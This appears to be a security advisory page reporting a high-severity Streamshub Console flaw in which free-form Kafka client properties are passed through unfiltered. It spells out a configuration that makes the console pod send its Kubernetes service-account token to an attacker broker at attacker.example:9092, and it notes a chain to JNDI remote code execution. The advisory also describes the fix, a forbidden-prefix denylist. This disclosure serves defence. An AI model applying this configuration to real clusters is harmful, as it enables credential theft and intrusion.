REDHAT-BUG-2539427: High severity Streamshub Console vulnerability

Published Sep 23, 2026
·
Updated

Unfiltered Kafka client properties → SA-token exfiltration via config.providers

Location: operator/src/main/java/com/github/streamshub/console/dependents/support/ConfigSupport.java:63 → api/src/main/java/com/github/streamshub/console/api/ClientFactory.java:571

Attacker: C — any K8s tenant with Console-CR create in one namespace

What it is. spec.kafkaClusters[].properties.values[] (and adminProperties/consumerProperties/producerProperties) is a free-form key/value list. ConfigSupport.setConfigVars does target.put(name, value) with no key filter; downstream ClientFactory.buildConfig copies clientProperties and config.getProperties() verbatim into the AdminClient config map. Nothing on either side blocks sasl., ssl., security., bootstrap.servers, or config.providers.

Why it's a security flaw. kafka-clients 4.3.1 blocks the JNDI/LDAP JAAS modules, but it does not block config.providers. Setting config.providers=directory, config.providers.directory.class=org.apache.kafka.common.config.provider.DirectoryConfigProvider, sasl.jaas.config=... username="${directory:/var/run/secrets/kubernetes.io/serviceaccount:token}" ... and bootstrap.servers=attacker.example:9092 makes the console-api pod resolve the placeholder to its own SA token and send it in the SASL handshake to an attacker-controlled broker — no JAAS bypass required. That token carries the same ClusterRole as f001. The primitive also chains with f006 (JAVATOOLOPTIONS clears disallowed.login.modules) to reach JNDI RCE. It is subsumed by f001 for attacker C but is an independent code path that survives an image allowlist.

Remediation. patches/f003.patch adds a FORBIDDENPREFIXES = {"sasl.", "ssl.", "security.", "bootstrap.servers", "config.providers"} denylist (mirroring Strimzi's KafkaConnectSpec forbidden-config pattern) and enforces it in both ConfigSupport.setConfigVars/copyData and in ClientFactory.buildConfig for defence in depth on non-operator deployments.

Affected Software

1 affected component
Streamshub Console

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade to a fixed release to a version that resolves this vulnerability.

    Patch f003.patch

Event History

Sep 23, 2026
Data Sourced
via Red Hat·02:21 PM
DescriptionSeverityAffected Software

Frequently Asked Questions

1

Who can exploit this issue?

A Kubernetes tenant that can create a Console custom resource in a namespace can supply the affected Kafka client properties. The attacker can direct bootstrap.servers to an attacker-controlled Kafka endpoint.

2

Does Kafka's JNDI/LDAP JAAS protection prevent exploitation?

No. Kafka clients 4.3.1 block the JNDI/LDAP JAAS modules, but the provided information states that config.providers remains allowed and can be used with DirectoryConfigProvider.

3

Which configuration inputs reach the Kafka client without filtering?

The free-form spec.kafkaClusters[].properties.values[] list, along with adminProperties, consumerProperties, and producerProperties, is copied into the client configuration. No filtering is described for sasl.*, ssl.*, security.*, bootstrap.servers, or config.providers.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203